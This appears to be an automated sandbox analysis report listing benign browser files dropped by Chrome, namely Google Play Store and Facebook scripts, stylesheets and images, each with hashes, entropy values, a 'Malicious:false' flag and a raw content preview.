                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("iAQMie");._.qr(_.KBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"iAQMie"}N(){return!0}Xa(){return _.NLc}});_.$q.iAQMie=_.eA;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29508)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):47151
                                                                                                                                                                                                                                  Entropy (8bit):5.952089202853815
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ZaxwKkt8KWW40V/WxwHhwWRPyywfeU0C+OEgFFlLpL6ndzxEVaGyZ:nKYb44/WCdPzwmUUvgbLLO5f
                                                                                                                                                                                                                                  MD5:1F6B67996C741FC059EA6DDE60A9077A
                                                                                                                                                                                                                                  SHA1:D9C9FF4A353A0FE208B7B17B7F78911B6D5DA377
                                                                                                                                                                                                                                  SHA-256:5516A7645C0A4B2DC0A892F298A3EC881638B995FECD9FB229C00A5BE09E36D3
                                                                                                                                                                                                                                  SHA-512:AD857D7905D220B081D30248330FE71C47CC12CDC5C8CF6F946D6FBAD2FA4B9FED3C08F0C15C8847545E58DE98322FB1BBA52C48EB789F3311BD5C59478561A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.css"
                                                                                                                                                                                                                                  Preview:._51o7{display:block}._51o6{vertical-align:middle}.._1vor{margin:0;padding:0}._1vor+._1vor{padding-top:12px}._3wef{outline:none}._3wee{float:right}._3weg{color:#0454a3;cursor:pointer}.._2kdf{display:inline-block;vertical-align:text-bottom}.._3hyi ._53ij{border:1px solid #ce002f;color:#ce002f}._n2c ._53ij,._3hyi ._53ij{border-radius:2px;box-shadow:0 1px 10px rgba(0, 0, 0, .35);max-width:334px;padding:6px 8px;white-space:pre-line}._n2c ._5v-0,._3hyi ._5v-0{padding-bottom:14px}._n2c ._53il,._3hyi ._53il{padding-top:14px}._n2c ._53im,._3hyi ._53im{padding-right:14px}._n2c ._53im,._3hyi ._53ik{padding-bottom:14px}._n2c ._53in,._3hyi ._53in{padding-left:14px}._n2c ._53il ._53io{background-image:url(/rsrc.php/v3/yQ/r/DvnOCCMHfz-.png);background-repeat:no-repeat;background-size:auto;background-position:-82px -49px}._3hyi ._53il ._53io{background-image:url(/rsrc.php/v3/y0/r/h4RMomoV_uh.png);background-repeat:no-repeat;background-size:auto;background-position:0 -165px}._n2c ._53il ._53io,._3hyi
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13802
                                                                                                                                                                                                                                  Entropy (8bit):7.98405703796919
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3dyNppVzFOTzLgPaFn/GE62nUe0jBQCaYbhbQmDswG34Z:teVzgTfF/ZTnURj29kbQmDXRZ
                                                                                                                                                                                                                                  MD5:40A8DD1520782887411D6AB369DFAC9B
                                                                                                                                                                                                                                  SHA1:EC8888E3BB035A76449B471381E0E717B12CED6A
                                                                                                                                                                                                                                  SHA-256:4824AC4EDE7817824CA80F9494065B9CE24D0953552F61E3B1E170D82ABFC6A3
                                                                                                                                                                                                                                  SHA-512:E678984A5697A6233D5D06C332976D6C4EA68D7D32A3AC09017D1D02200962388B56D7A362F88659709D8213BED04CBFD8CFB8BA20AC0C7B52AECE364099D167
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.5..WEBPVP8X..............VP8 .5..P....*....>e(.E."..-...@..f..d....................c.y....>`.....K..G.g./.}y.r.G~....!.E......PO.....*z.~.zs...-.l...I.!........TWO<!...2gi.q3....?*u.....O.....<.~..#.....z.~byl.Z................................G...........?.Re..p.?.........s.,.&.Ox!...K.7......~A..~2x...0.LM.a..&^!J..f....j6...N. 2>,.Q..P..S./.0A..Z{&S...Fw.......?......].%{....J~.S...*....-0N..,XAFJr. ~..u.:.......|Q,..#.q%...)..{i.x[....A./.0+...W..|....S..j...p.A..........7..cI@.3.....=._.t.....'K.9.rke/w7....n...$d...%.b...`]./K,....:......qW.Y..u.f.!......!fD...o.y%:...}.._.c.ej..Q....b.."q.B.^.h.K;C;..s.....B.....w.@z:...q.....\4........@.0....[.wK.N9F..@.....b.............N..S&l....1.7/........./.'4........W.*[._..|.I:...`....0.:b...2.T.r.v0..`..}*."e..mT..(Nl..^FM.g?Xw..d.w.lRr.....E%3l......y..n...].|.?.eW..5......P.xXr....O.A.[.....f.{.a...&.-%H...|...1..".....G...sI..O"Bj!...w?.......D.4wd.Q.=A.... ..u:..w.....[...q.....!..GTt./{.4.{
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15897
                                                                                                                                                                                                                                  Entropy (8bit):7.946740870330592
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jbbbbbbbbbbbbbQzT3j3io+WNhNGm5AF1oXusCoK9YQkOijdHsLe0xG1ozUo+bWD:QT3jSoBGm5O1ojLQ3ij1+x1oy3jxjCWr
                                                                                                                                                                                                                                  MD5:1CEB0790FB55DA1C7D5347CD7940B21A
                                                                                                                                                                                                                                  SHA1:F737DB3F0DC45D269458AA7A020695A6C5C24BD5
                                                                                                                                                                                                                                  SHA-256:20789D99A3355C0786C4BE414F2B24012E4D544BF105CA3AE702BA2434F0E778
                                                                                                                                                                                                                                  SHA-512:70429B634B8EC4101A8A93DA192F1796A51E8A324AF601ECBBEE28C2EF7D344DBB7024D6B172E4D162EAC6C853D72AB20C01C6CD008D8B3799A2919993AADBDC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......JFIF...............................%....%..''.'10-(--5=PB58K9+-EaEKSV[\[2AemdXlPY[W......./..0]@8BWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......h....".......................................F........................!.1AQ."a...2Rq........#B.Sbr.3C...$...cs..................................3........................!.1QA.."#2aq......B..$3R............?.......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B...G..zL.>..4..;....m..!t|.'.....#I.3..'G'...........|..i=&w.....63....4..;.<.'.........s..>E..gy.S.I}&w...d.6K..B.y._I....D..gy.S...l......$..;.<./.........x9.]/"K.3..#..L.>.:.<...sP.^D..gy.R6...;.t2x.%..!vc.53.>/iw.M.d....}.~..).-........G.!...U.........../..?..B....?....G.O......%.t...^..^'....P~..}8}..../..?..B...~'..w.P~..=8}.~........B.~..zq{...G..A.p.............I..2.y...O..W. ...S./.t...h^.......y......^.>..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (506)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5179
                                                                                                                                                                                                                                  Entropy (8bit):5.650644557546613
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kqoHfm5GYRcfo2hImUtQE3M3spu2VbV54Bj5eRnl:KHfmUMcd4QuG2uqbVWN5E
                                                                                                                                                                                                                                  MD5:9197458A966F130594BE4B9D9F166725
                                                                                                                                                                                                                                  SHA1:78D82A37E938B19D61126B783B4EC0E062475527
                                                                                                                                                                                                                                  SHA-256:34DC8F1271B4A633FFE89E0DD212BD5A2ACCD516DC0CD08AE4B13810BBD6F6B3
                                                                                                                                                                                                                                  SHA-512:3AC563C9B6D63136F237968B9508D02238C9B08908BB820A5F637469E43203D2BA2D31509ED14C6BBC6B64AB789111B21769813425451147442B5FC95F541F27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.EGc=function(a,b){b=(a?"zwAiMc":"Qv3d6b")+(b?" MgDOBd":"");var c=_.P;a=(0,_.P)('<svg class="'+_.T(a?"j9Syhb":"bKsVV")+'" viewBox="0 0 56 56" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M28 56C43.464 56 56 43.464 56 28C56 12.536 43.464 0 28 0C12.536 0 0 12.536 0 28C0 43.464 12.536 56 28 56Z" fill="black" fill-opacity="0.54"/><path fill-rule="evenodd" clip-rule="evenodd" d="M39.6667 28L21 17.5V38.5L39.6667 28Z" fill="white"/></svg>');a=""+_.iO(c(""+.a),void 0,b);return(0,_.P)(a)};._.N5=function(a,b,c,d){return(0,_.P)('<div class="'+_.T("uMConb")+" "+(d?_.T("giMhIc"):"")+" "+(b?_.T(b):"")+'"'+_.Vo(_.Uo(c??""))+">"+_.Q(a)+"</div>")};_.O5=function(a,b){return(0,_.P)('<div class="'+_.T("vU6FJ")+" "+_.T(b??"")+'">'+_.Q(a)+"</div>")};_.P5=function(a,b,c){return(0,_.P)("<div"+_.Vo(_.Uo(_.dp(a,!0)))+' class="'+_.T("b8cIId")+" "+_.T("ReQCgd")+
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (502)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1596
                                                                                                                                                                                                                                  Entropy (8bit):5.581511846844705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kzJvWUV3kUmlVf/Uc5mXwbPZn/ewqOBO5rZzj/bEaUUS3ybEvoPi2knprl:kZX3iPD5KwNUzHzUoQiHkprl
                                                                                                                                                                                                                                  MD5:1BAE47B458FFBC6DF728A280FF5E0131
                                                                                                                                                                                                                                  SHA1:E4D48A12E4D8D6E4DFD4A42EB967E9FE23F281E0
                                                                                                                                                                                                                                  SHA-256:BCBA348F5ECBA6A3FD5BAC662C18A6459147FF218E80D2C8CE6159A08778C301
                                                                                                                                                                                                                                  SHA-512:1883B907077CB660FF1D99D64BC4F38617A918781D5061EA363972E3E0B6FBE13F96F7D89E47459BE2B933548CDA94EF703A4E6CFA102E0AB6A6AAC529847550
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=w08zce"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{.var WRc,XRc,YRc,ZRc;._.$Rc=function(a,b){var c=a.Aa;const d=a.lb,e=a.Sp;var f=_.P;a=a.qa;var g=_.P;b.Kd.H()===2?(c=c.H(),b=(0,_.P)('<div class="'+_.T("ex4AWb")+'"><div class="'+_.T("oVP4Cb")+'">'+WRc(b,e)+'</div><div class="'+_.T("OI7HUe")+'"><div class="'+_.T("zri8D")+'">'+XRc(e)+YRc(b,e)+"</div>"+ZRc(b,d,c)+"</div></div>")):(c=c.H(),b=(0,_.P)('<div class="'+_.T("ex4AWb")+'"><div class="'+_.T("oVP4Cb")+'"><div class="'+_.T("aELZ1d")+'"></div>'+WRc(b,e)+'</div><div class="'+_.T("OI7HUe")+'"><div class="'+_.T("zri8D")+.'">'+XRc(e)+YRc(b,e)+"</div>"+ZRc(b,d,c)+"</div></div>"));return f(_.$W({qa:a,body:g(""+b)}))};WRc=function(a,b){a=""+_.jX(a,500,280,void 0,b.H(),"Rd7OUe",void 0,void 0,(0,_.Jo)('style="max-height: '+_.T(_.$o(280))+'px"'));return(0,_.P)(a)};XRc=function(a){return(0,_.P)('<h2 class="'+_.T("J7tk9b")+'">'+_.Q(a.Ja())+"</h2>")};YRc=function(a,b){a=""+_.HX({href:(0,_.Io)(""+_.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1315
                                                                                                                                                                                                                                  Entropy (8bit):6.699572044474413
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:L5Y6JIZ663SuWh8I+pCLmPQnTbBeX/7vetxw9LIQnJkKk0c:LEZ6mSuU89tPQT9y7R9TJk7
                                                                                                                                                                                                                                  MD5:AC1E1C4D6F16359701B059ED4E8246B4
                                                                                                                                                                                                                                  SHA1:FF19B30A3B3D8D1765C239B25DBC98CB3263786A
                                                                                                                                                                                                                                  SHA-256:45444D590A67D30E8B2FDE01BB6482F829383B64BF14A4B19B86E22FDC319FBB
                                                                                                                                                                                                                                  SHA-512:97E16A8A20E00FA17BEB11A5C77768F9FA42E1BD6B797DEB1FAB0A5B477C036A29E1785AA92947264F2E5972C05887969948F43FF4E69D4320A9BEB4B1664831
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...................aPLTEGpL...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E.B.....tRNS..5.Pp.H../.)..hL.M.>a1.3..' -......g@......Z.Yi.....\Q.I.WueU..;.[..?...wyn..}.7z:.=....s..d,.+*".%.....K.A2.C..E.m..kD.ql..Gov.J..t........O#....4]_.B6.Sc...9..R8{...`....<....~............^sx.m....IDAT(.c`....N/q...[y.d...=.Ds...|jF.................X`....}3.g..$....U .arN...x..T....(d+V.7.......kq.N.'g........~...M..9.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (970)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20164
                                                                                                                                                                                                                                  Entropy (8bit):5.7099139939270005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:jiJBhuEyXdKXkZyw+4/YHRDgvHUsWd4jKMbxYWRobPnj/Cp0LnRgCRWwq0tSxUVr:jiJBOXUUZyw+4/YHRcvHlWd4jKMbxYUY
                                                                                                                                                                                                                                  MD5:CC2B86A5E2CBBDB882CB8B4D5A1D2E03
                                                                                                                                                                                                                                  SHA1:8777110EF4C3C54E04A59874BE7DD34B8FB587C9
                                                                                                                                                                                                                                  SHA-256:F2EEEEE41B760E13FBB1CBD8A691E2BC9DEA33A6B8364863E0FDEC4BACC13812
                                                                                                                                                                                                                                  SHA-512:B0FB29E9C8B841F329D4DE8BA3F4AEDF3E094F8DFC74396CA847CFE074A7EE2599CB66D6D365997D414637B060DA5B18160B46932D8E016B34C4ECE29A9503EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.rf(_.upa);._.u("sOXFj");.var qxa=class extends _.Dq{constructor(a){super(a.ta)}H(a){return a()}};_.Eq(_.tpa,qxa);._.w();._.u("oGtAuc");._.hxa=new _.ae(_.upa);._.w();._.ixa=class extends _.Pk{static Ia(){return{Sl:{VY(a){return _.Jd(a)}}}}constructor(a){super(a.ta);this.soy=this.Tj=null;if(this.Pk()){var b=_.Hj(this.Yh(),[_.ek,_.dk]);b=_.Pe([b[_.ek],b[_.dk]]).then(function(c){this.soy=c[0];this.Tj=c[1]},null,this);_.Qk(this,b)}this.Na=a.Sl.VY}ep(a){return this.Na.ep(a)}getData(a){return this.Na.getData(a)}ir(){_.ml(this.Tj.hf())}iH(){}};_.qr=(a,b)=>{a&&_.ce.Eb().register(a,b)};._.u("q0xTif");.var kxa=function(a){const b=c=>{_.Yk(c)&&(_.Yk(c).oc=null,_.br(c,null));c.XyHi9&&(c.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(let c=0;c<a.length;c++)b(a[c])};var lxa,mxa,nxa,oxa;lxa=function(a){const b=a.Xa();return(...c)=>a.Ra.H(()=>b(...c))};mxa=function(a){const b=a.V();return b?(.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13872
                                                                                                                                                                                                                                  Entropy (8bit):7.980300182065605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Gh6p+Tm8jirohmGIFmiK7Vo/JohQP7sWiPqo2GO:2bnjLb+K/kiRbO
                                                                                                                                                                                                                                  MD5:00B14239442EE700C3F044E78B2255F4
                                                                                                                                                                                                                                  SHA1:7A048ED492BCA6D58D15C3D28A52D9005F440842
                                                                                                                                                                                                                                  SHA-256:425BD8EA4368AAC14378F2B1513C22966DCAC845D143837FC632D1E9C642F749
                                                                                                                                                                                                                                  SHA-512:E831C585B5B01A72ED3E912EACF1087F10CD6A25DD29E538D3D6B875864952960CBE2C386281FFA7F159675256F778785A1C8E3AC460E26B575EE392734B2488
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF(6..WEBPVP8X..............VP8 .5..P....*....>.T.H$"..i.PD...7Kw. S.d....^s.....o.<....7..=d~....X...../.........._.}......E.....y./.......................?.?..V.....oc<............................;.>r.[.;.....?.?........?.=.?......#.......>........y..........F.j6.Q.....m..l4.'.8.\H....m..<O..G.qN..B....Fr.K.,..-.I.q.].7;......).H.Bvl..>K..|..Z.a..#G.k..gX..){...#......@M.)!v9.jy9...GLe..q.....$L^.A........#a0..aR.h.Ox 66.p..B(v.t.....f_.i..2.|"..x.......H.L...$...;3r^.qt...].@t.|).U...5..6. 9"..R.>..y.>>..u.8.....]....#e(AA......A...T.6.6.%'m.oYt.m..U.)t......QSz."~+Y^...X...S)H..D..C%.............'.\.1Y"wN..1......DW...*......\..WV...n......;...6QT......E.j.uy.._.y!~..e....Z.9.Y.......o.>.3...E..R.UXM,....hcB. ..Y0..{..aiJ.{.....|.U.8k..D.1..U.8L..gdn........e...R........Pa?r.....<*.7_.~..II..!\.........kDH.......ZP..n.7v....U....h!Gk;o.......,obH.....U..0.....<..O:.m5Q5..>.R.k..U0&...4-..O.&..@..\....q".(..w..../$...D..:.A.:>..&
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8096)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55228
                                                                                                                                                                                                                                  Entropy (8bit):5.329308796986016
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:c3Rf8me01IhZaorAIZu42ZlJZ4Us/Hlybpypdagqf:ixe0IZu1D4jvlybn
                                                                                                                                                                                                                                  MD5:614AF3AA20EF61E30C3FFE0C88FE61DA
                                                                                                                                                                                                                                  SHA1:48018D5135B84EF010A2C228C5F4411BE8597357
                                                                                                                                                                                                                                  SHA-256:66ED8A76E009F2492B61ABC94BB5A4F0867B60CB397057B4E8A5905AFD9412E2
                                                                                                                                                                                                                                  SHA-512:4D9B3D7DF01A2621141775DE8BD58FD43D38AF88598E6A8F14DC0E0DA4A3F900BB5B963826D37D1EBBAE24CC1D4F1026AADCC6184427323EF1D25D48A46101B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsObjectTypes",[],(function(a,b,c,d,e,f){a=Object.freeze({ACCOUNT:"ACCOUNT",ADGROUP:"ADGROUP",AUDIENCE:"AUDIENCE",BUSINESS_ACCOUNT:"BUSINESS_ACCOUNT",CAMPAIGN:"CAMPAIGN",CAMPAIGN_GROUP:"CAMPAIGN_GROUP",CREATION_PACKAGE:"CREATION_PACKAGE",CREATIVE:"CREATIVE",HISTORY:"HISTORY",OPPORTUNITIES:"OPPORTUNITIES",PIXEL:"PIXEL",PRIVACY_INFO_CENTER:"PRIVACY_INFO_CENTER",TRANSACTION:"TRANSACTION",MESSAGES:"MESSAGES"});f["default"]=a}),66);.__d("AdsALSubsurface",["AdsObjectTypes"],(function(a,b,c,d,e,f,g){"use strict";var h=(f={},f[c("AdsObjectTypes").CAMPAIGN_GROUP]="campaign",f[c("AdsObjectTypes").CAMPAIGN]="adset",f[c("AdsObjectTypes").ADGROUP]="ad",f);function a(a,b){return a+":"+b}function b(a){var b;if(a==null)return;return(b=h[a])!=null?b:a.toLowerCase()}function d(a){return a}function e(a){return a==null?"":a}g.getFullSurfaceString=a;g.getAdsObjectTypeSubsurface=b;g.getAdObjectLevelSubsurface=d;g.getDynamicSubsurface=e}),98);.__d("Currency",["CurrencyConfig"],(funct
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (20398)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):354326
                                                                                                                                                                                                                                  Entropy (8bit):5.402542515680638
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Wjx6Fh5yD6y2yjEKLPGMZMg9bV4XG77jzfwWEf8/:Wsv8D6y0KLPGMZZ9bVj7wWEf8/
                                                                                                                                                                                                                                  MD5:25E4014B07BBBA82DAF9E43D50280FB8
                                                                                                                                                                                                                                  SHA1:465FF25F0AACB572CD6F701D76CCBF3897951E65
                                                                                                                                                                                                                                  SHA-256:C92D4A3BB4BDC316E737064741F09C6079E8C5352E4D7E3286D9CD08329D8FAF
                                                                                                                                                                                                                                  SHA-512:79FB0B015225233A7CBB4391DEC5573F9EC274346129DDD24F3787F5CDB09370A839EC6C04629CEFC7CB1DC2DEB241FE2BDBD88AE2A9661D9983251AA93B32DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196106
                                                                                                                                                                                                                                  Entropy (8bit):7.990776663094435
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:aGiIUL1GIdxk50gNf21ukLKFEpxSJs0nbOJq2qG8yeD0ZykmlSyPi23cj/XYO84:/I5dx40Y21ukLJpss0bAqrfy20Zvmltu
                                                                                                                                                                                                                                  MD5:8AB645353AFE046E0A08FB2C849A620A
                                                                                                                                                                                                                                  SHA1:10AC65C1EE690A3C750389C3BBA09C25937E6D48
                                                                                                                                                                                                                                  SHA-256:31EEC9494026181C6E99DF6C72D79F085FD70CB2019E3916DB8D123BF70DE8DF
                                                                                                                                                                                                                                  SHA-512:582FE94A49CA57477B5581CD261D002615FBE5FC8857E37BAB50D5E95F0299C7526AFB6D0A429EBE0D3FE37A5322D079D73ED31F8400C1ACF9EC44B74D583D9E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.MP.m;l..>......P.t......J..u..Jz..pl...x......h.(c..>...&Q.7?%..<?ivP......._.......Pv..7.O#..........H.V..!j...T...<.#..Du.f..DuNT..Y.g...oeuY~..{..Ue...6..D;..*.Z()5.e..!..W.$.....jT0...j<.*ujM...v'....2...$..!..). t...F.P..H. .......]... .^hE.h.... x.....r.+-~n..[R..<....1P..I"..V...[".*...yrEG...mS0a&...y[..;aBr%...u.X.'.....w..x.MD.fV.]..c.4..[..,.$m..*.mw...........j.L..6oL2..09[.Q...>.*V.=.l.]....W..O..7_y..*.......L".w.{>c......}O.0cw.?...0.Q.<G...F.......... ......~K.1.'..$..&>I...hT.<1t.I....0..$x]...H.9...]$.uzJ..uos^...(.Y.U....s.....G..N........V.m..G.$.N.B?.{...i...$HLb.0B.....O.[....m..cL0.....~.Z.e.&.oruEQ.#.88.....im....Kq........-=..Z.I.F...........W.'.cOeOe.'.........P....J.DI.E0.H.L...+!..R$C.$%Q..I.H.$.".Rp......@QF.SY.4_..B.'...-...7.....?.+.._....IJT..BB.......I.....A.../...A...A.^....7...t# n@.h. ...?.A.....3...C.o.Ot....=@..._.......>J....rs........0q.00..5.z.e`..%\0.......Kw..vX..p..........}...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):75826
